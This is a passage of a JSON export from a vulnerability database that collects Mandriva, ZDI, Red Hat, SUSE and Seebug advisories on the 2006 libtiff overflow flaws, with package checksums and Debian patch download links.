x86_64/2006.0/RPMS/lib64tiff3-devel-3.6.1-12.6.20060mdk.x86_64.rpm\r\n 673437e87cd25febee28993cd3c9488d x86_64/2006.0/RPMS/lib64tiff3-static-devel-3.6.1-12.6.20060mdk.x86_64.rpm\r\n c0173eb2f2d497fce68b863a6d01433e x86_64/2006.0/RPMS/libtiff3-3.6.1-12.6.20060mdk.i586.rpm\r\n 55369714ae92ea654507f33944285322 x86_64/2006.0/RPMS/libtiff3-devel-3.6.1-12.6.20060mdk.i586.rpm\r\n 8303a2a5f5b98d0fe984c4f62a8849e7 x86_64/2006.0/RPMS/libtiff3-static-devel-3.6.1-12.6.20060mdk.i586.rpm\r\n c3a7a68b6fef5f74240a6f526412d216 x86_64/2006.0/RPMS/libtiff-progs-3.6.1-12.6.20060mdk.x86_64.rpm\r\n 1f77f216c421961825035b17e2fc3d0f x86_64/2006.0/SRPMS/libtiff-3.6.1-12.6.20060mdk.src.rpm\r\n\r\n Corporate 3.0:\r\n 7ed65170763bdbb2db2c73a0e6d21dc5 corporate/3.0/RPMS/libtiff3-3.5.7-11.12.C30mdk.i586.rpm\r\n c4fd193c4ac3c199f98751b615f7f5ad corporate/3.0/RPMS/libtiff3-devel-3.5.7-11.12.C30mdk.i586.rpm\r\n 2d4920c58d576d4174358a62eb533acd corporate/3.0/RPMS/libtiff3-static-devel-3.5.7-11.12.C30mdk.i586.rpm\r\n aa07135a25873d7265dfb1a4ac1fd365 corporate/3.0/RPMS/libtiff-progs-3.5.7-11.12.C30mdk.i586.rpm\r\n 8c70315b6e8fcbfeb56abaf9df8fef52 corporate/3.0/SRPMS/libtiff-3.5.7-11.12.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n c48326e5749da37145fe7744b2ec7da7 x86_64/corporate/3.0/RPMS/lib64tiff3-3.5.7-11.12.C30mdk.x86_64.rpm\r\n d5a2fa2ad3de5d7a77332920eea6ccb2 x86_64/corporate/3.0/RPMS/lib64tiff3-devel-3.5.7-11.12.C30mdk.x86_64.rpm\r\n 3582b0f21935141f83bb83787ce6537a x86_64/corporate/3.0/RPMS/lib64tiff3-static-devel-3.5.7-11.12.C30mdk.x86_64.rpm\r\n 7ed65170763bdbb2db2c73a0e6d21dc5 x86_64/corporate/3.0/RPMS/libtiff3-3.5.7-11.12.C30mdk.i586.rpm\r\n b8de80aaa29a62815ef364357c319d95 x86_64/corporate/3.0/RPMS/libtiff-progs-3.5.7-11.12.C30mdk.x86_64.rpm\r\n 8c70315b6e8fcbfeb56abaf9df8fef52 x86_64/corporate/3.0/SRPMS/libtiff-3.5.7-11.12.C30mdk.src.rpm\r\n\r\n Multi Network Firewall 2.0:\r\n 8cc2951ca065dced86d900d2713f7755 mnf/2.0/RPMS/libtiff3-3.5.7-11.12.M20mdk.i586.rpm\r\n 20c7813342fc7964cfc3f35465232ade mnf/2.0/SRPMS/libtiff-3.5.7-11.12.M20mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFEz4TtmqjQ0CJFipgRAjTYAJ9tZ6Kqz9K0x3vYAWL8PHtli0+rTgCeN5m8\r\n+R9B81Ti9uezqZlT1CNf3o8=\r\n=TKF2\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2006-08-02T00:00:00", "published": "2006-08-02T00:00:00", "id": "SECURITYVULNS:DOC:13684", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13684", "title": "[ MDKSA-2006:137 ] - Updated libtiff packages fix multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "ZDI-11-302 : Adobe Reader U3D TIFF Resource Buffer Overflow Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-302\r\nOctober 26, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-2432\r\n\r\n-- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n-- Affected Vendors:\r\n\r\nAdobe\r\n\r\n\r\n\r\n-- Affected Products:\r\n\r\nAdobe Reader\r\n\r\n\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Reader X. User interaction is required\r\nto exploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists within because Adobe Reader X includes an old\r\nversion of libtiff. Adobe can be tricked in using this library by\r\nparsing a specially crafted PDF file containing U3D data. Due to the old\r\nversion of libtiff Adobe Reader is vulnerable to the issue described in\r\nCVE-2006-3459 which can be leveraged to execute remote code under the\r\ncontext of the user running the application.\r\n\r\n-- Vendor Response:\r\n\r\nAdobe has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb11-24.html\r\n\r\n\r\n\r\n-- Disclosure Timeline:\r\n2011-05-12 - Vulnerability reported to vendor\r\n2011-10-26 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* binaryproof\r\n\r\n\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n", "modified": "2011-10-31T00:00:00", "published": "2011-10-31T00:00:00", "id": "SECURITYVULNS:DOC:27232", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27232", "title": "ZDI-11-302 : Adobe Reader U3D TIFF Resource Buffer Overflow Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:06", "bulletinFamily": "unix", "description": "The kdegraphics package contains graphics applications for the K Desktop\r\nEnvironment.\r\n\r\nTavis Ormandy of Google discovered a number of flaws in libtiff during a\r\nsecurity audit. The kfax application contains a copy of the libtiff code\r\nused for parsing TIFF files and is therefore affected by these flaws. \r\nAn attacker who has the ability to trick a user into opening a malicious\r\nTIFF file could cause kfax to crash or possibly execute arbitrary code.\r\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463,\r\nCVE-2006-3464, CVE-2006-3465)\r\n\r\nRed Hat Enterprise Linux 4 is not vulnerable to these issues as kfax uses\r\nthe shared libtiff library which has been fixed in a previous update.\r\n\r\nUsers of kfax should upgrade to these updated packages, which contain\r\nbackported patches and are not vulnerable to this issue.", "modified": "2019-03-22T23:43:40", "published": "2006-08-28T04:00:00", "id": "RHSA-2006:0648", "href": "https://access.redhat.com/errata/RHSA-2006:0648", "type": "redhat", "title": "(RHSA-2006:0648) kdegraphics security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:19:41", "bulletinFamily": "unix", "description": "This update of libtiff is the result of a source-code audit done by Tavis Ormandy, Google Security Team. It fixes various bugs that can lead to denial-of-service conditions as well as to remote code execution while parsing a tiff image provided by an attacker.\n#### Solution\nNo work-around known.", "modified": "2006-08-01T16:39:12", "published": "2006-08-01T16:39:12", "id": "SUSE-SA:2006:044", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-08/msg00008.html", "title": "possible remote code execution in libtiff", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:22:40", "bulletinFamily": "exploit", "description": "LibTiff\u662f\u8d1f\u8d23\u5bf9TIFF\u56fe\u8c61\u683c\u5f0f\u8fdb\u884c\u7f16\u7801/\u89e3\u7801\u7684\u5e94\u7528\u5e93\u3002\r\n\r\nTIFF\u5e93\u4e2d\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u5177\u4f53\u5982\u4e0b\uff1a\r\n\r\nCVE-2006-3459\r\n\r\n\u591a\u4e2a\u6808\u6ea2\u51fa\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\nCVE-2006-3460\r\n\r\nJPEG\u89e3\u7801\u5668\u4e2d\u5b58\u5728\u5806\u6ea2\u51fa\u6f0f\u6d1e\u3002\r\n\r\nCVE-2006-3461\r\n\r\nPixarLog\u89e3\u7801\u5668\u4e2d\u5b58\u5728\u5806\u6ea2\u51fa\u6f0f\u6d1e\u3002\r\n\r\nCVE-2006-3462\r\n\r\nNeXT RLE\u89e3\u7801\u5668\u4e2d\u5b58\u5728\u5806\u6ea2\u51fa\u6f0f\u6d1e\u3002\r\n\r\nCVE-2006-3463\r\n\r\n\u5faa\u73af\u4e2d16\u4f4d\u7684\u65e0\u7b26\u77ed\u578b\u7528\u4e8e\u8fed\u4ee332\u4f4d\u7684\u65e0\u7b26\u503c\uff0c\u56e0\u6b64\u5faa\u73af\u4e0d\u4f1a\u7ec8\u6b62\uff0c\u5bfc\u81f4\u6b7b\u5faa\u73af\u3002\r\n\r\nCVE-2006-3464\r\n\r\nlibtiff\u4e2d\u5b58\u5728\u591a\u4e2a\u672a\u7ecf\u68c0\u67e5\u7684\u7b97\u672f\u64cd\u4f5c\uff0c\u5305\u62ec\u7528\u4e8e\u786e\u4fddTIFF\u76ee\u5f55\u4e2d\u6240\u6307\u5b9a\u504f\u79fb\u5408\u6cd5\u6027\u7684\u5404\u79cd\u64cd\u4f5c\u3002\r\n\r\nCVE-2006-3465\r\n\r\nlibtiff\u81ea\u5b9a\u4e49\u6807\u7b7e\u652f\u6301\u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u5f02\u5e38\u3001\u5d29\u6e83\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\n\nApple Mac OS X 10.4.7\r\nApple Mac OS X 10.3.9\r\nApple MacOS X Server 10.4.7\r\nApple MacOS X Server 10.3.9\r\nDebian Linux 3.1\r\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux WS 3\r\nRedHat Enterprise Linux WS 2.1\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux ES 3\r\nRedHat Enterprise Linux ES 2.1\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux AS 3\r\nRedHat Enterprise Linux AS 2.1\r\nLibTIFF LibTIFF <= 3.8.2\n \u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n* Apple SecUpdSrvr2006-004Pan.dmg\r\n<a href=\"http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=11231&cat=1&platform=osx&method=sa/SecUpdSrvr2006-004Pan.dmg\" target=\"_blank\">http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=11231&cat=1&platform=osx&method=sa/SecUpdSrvr2006-004Pan.dmg</a>\r\n\r\n* Apple SecUpd2006-004Pan.dmg\r\n<a href=\"http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=11230&cat=1&platform=osx&method=sa/SecUpd2006-004Pan.dmg\" target=\"_blank\">http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=11230&cat=1&platform=osx&method=sa/SecUpd2006-004Pan.dmg</a>\r\n \r\n* Apple SecUpd2006-004Intel.dmg\r\n<a href=\"http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=11232&cat=1&platform=osx&method=sa/SecUpd2006-004Intel.dmg\" target=\"_blank\">http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=11232&cat=1&platform=osx&method=sa/SecUpd2006-004Intel.dmg</a>\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1137-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1137-1\uff1aNew tiff packages fix several vulnerabilities\r\n\u94fe\u63a5\uff1a<a href=\"http://www.debian.org/security/2005/dsa-1137\" target=\"_blank\">http://www.debian.org/security/2005/dsa-1137</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-7.dsc\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-7.dsc</a>\r\nSize/MD5 checksum: 736 ce0ffb8cdd1130153deaefa8b59abe81\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-7.diff.gz\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-7.diff.gz</a>\r\nSize/MD5 checksum: 17174 ff485016221ededfc8ce649538322211\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2.orig.tar.gz\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2.orig.tar.gz</a>\r\nSize/MD5 checksum: 1252995 221679f6d5c15670b3c242cbfff79a00\r\n\r\nAlpha architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_alpha.deb</a>\r\nSize/MD5 checksum: 47112 a4f7feea087ba03a84f745ee79a7ff56\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_alpha.deb</a>\r\nSize/MD5 checksum: 243840 f7abb618f36082be959f6e3c9a99cf8f\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_alpha.deb</a>\r\nSize/MD5 checksum: 479064 c137c6857ed320928f182115fbd94b21\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_alpha.deb</a>\r\nSize/MD5 checksum: 311206 c202ef6404c23ea7dc999c03e586c07f\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_alpha.deb</a>\r\nSize/MD5 checksum: 41228 53c5979e8c2556e5a19607c19e862368\r\n\r\nAMD64 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_amd64.deb</a>\r\nSize/MD5 checksum: 46036 bc6d0c7db57a1dcae4b8dd65b4640243\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_amd64.deb</a>\r\nSize/MD5 checksum: 218060 d09ef1de8b31f074d2f05c7522858cf1\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_amd64.deb</a>\r\nSize/MD5 checksum: 459964 8be097d74ac788d87a8358b8f9e68d79\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_amd64.deb</a>\r\nSize/MD5 checksum: 267872 cc0a4241cd53de29b561286fcd91cf2c\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_amd64.deb</a>\r\nSize/MD5 checksum: 40804 136bc49ad0c85dc6fa9f61242cf97c05\r\n\r\nARM architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_arm.deb</a>\r\nSize/MD5 checksum: 45536 0253b94c6f94a33c9942568f9093fedd\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_arm.deb</a>\r\nSize/MD5 checksum: 208630 45e2ef6af43bfbddb4aee00b659d287a\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_arm.deb</a>\r\nSize/MD5 checksum: 454194 354e1b4560b4a407c4b4faf5d2555b20\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_arm.deb</a>\r\nSize/MD5 checksum: 266148 f535b441d81a7786815d954c843b9c81\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_arm.deb</a>\r\nSize/MD5 checksum: 40304 fcd0980c8fc2dedaa8a6380e0d4736bd\r\n\r\nIntel IA-32 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_i386.deb</a>\r\nSize/MD5 checksum: 45400 e51d8f157a2ef94cbc4e893f756be29a\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_i386.deb</a>\r\nSize/MD5 checksum: 206412 69a3c66b2c9733653e6e7f667ab260b3\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_i386.deb</a>\r\nSize/MD5 checksum: 453078 267f8f361f0dc87f40c8bc37d4785f57\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_i386.deb</a>\r\nSize/MD5 checksum: 252412 5720af1515d6c9ce04f0e7abea045955\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_i386.deb</a>\r\nSize/MD5 checksum: 40850 18710ba8ae073bd5a6e7b3c299cbae23\r\n\r\nIntel IA-64 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_ia64.deb</a>\r\nSize/MD5 checksum: 48512 c57280d747f62859c4477a0f1dcbcfef\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_ia64.deb</a>\r\nSize/MD5 checksum: 269156 277ad4a79cd2148991134c6ed8c029fe\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_ia64.deb</a>\r\nSize/MD5 checksum: 511782 4b64fd28c917e7e2e158c7244cfc892d\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_ia64.deb</a>\r\nSize/MD5 checksum: 331790 614a46318d671800caab21e26df9c1bf\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_ia64.deb</a>\r\nSize/MD5 checksum: 42450 af80a3234e174d9f15bbb4e68d2b558f\r\n\r\nHP Precision architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_hppa.deb</a>\r\nSize/MD5 checksum: 46846 e863b11db8f25a221776ea306eeb1539\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_hppa.deb</a>\r\nSize/MD5 checksum: 230316 9ccb777cf49096a2dabf144de609b83c\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_hppa.deb</a>\r\nSize/MD5 checksum: 473764 6938692095c40fba1f5feca1efd243a8\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_hppa.deb</a>\r\nSize/MD5 checksum: 282648 68ffb8ebaac2404aa1f9a709e83abfc6\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_hppa.deb</a>\r\nSize/MD5 checksum: 41476 4327a6e2887ab7d5bb69d0476186d69e\r\n\r\nMotorola 680x0 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_m68k.deb</a>\r\nSize/MD5 checksum: 45408 e33d428b54a5776181803c28475e2a30\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_m68k.deb</a>\r\nSize/MD5 checksum: 193578 d7f3db57205002a50354df9cc1e74767\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_m68k.deb</a>\r\nSize/MD5 checksum: 443280 2e982f2b17745777ff6e249f627b1b4c\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_m68k.deb</a>\r\nSize/MD5 checksum: 235056 c362aaa8589f44a3dc533143c37fd16b\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_m68k.deb</a>\r\nSize/MD5 checksum: 40450 279a59887fd7a90b9d92415a07fe87f1\r\n\r\nBig endian MIPS architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_mips.deb</a>\r\nSize/MD5 checksum: 46300 c26b165f7098aa083170b90c8002406e\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_mips.deb</a>\r\nSize/MD5 checksum: 252404 77b6d4382ee49bab1d3b94ea69d3bd88\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_mips.deb</a>\r\nSize/MD5 checksum: 459088 34e8d02f8bac8bc4b059bc36109dda66\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_mips.deb</a>\r\nSize/MD5 checksum: 281156 c2bf726c93de2c1ce1cb289d65fec892\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_mips.deb</a>\r\nSize/MD5 checksum: 41086 85b8389df1df050f12fd87488ab46c02\r\n\r\nLittle endian MIPS architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_mipsel.deb</a>\r\nSize/MD5 checksum: 46256 8a1cc8fbd9e7679f2ec722f46a300fe1\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_mipsel.deb</a>\r\nSize/MD5 checksum: 252820 876a24a6b4b49d19eb2d425f7271528e\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_mipsel.deb</a>\r\nSize/MD5 checksum: 459392 f1d09bb13a31f8ec73922f50d538b073\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_mipsel.deb</a>\r\nSize/MD5 checksum: 280986 eff50ab58f511148d9d56ecbbc02c162\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_mipsel.deb</a>\r\nSize/MD5 checksum: 41066 7490a101b2de00f6f458359f64b05daa\r\n\r\nPowerPC architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_powerpc.deb</a>\r\nSize/MD5 checksum: 47462 3eaaac85e15b48dd1add1fb314de9b74\r\n<a 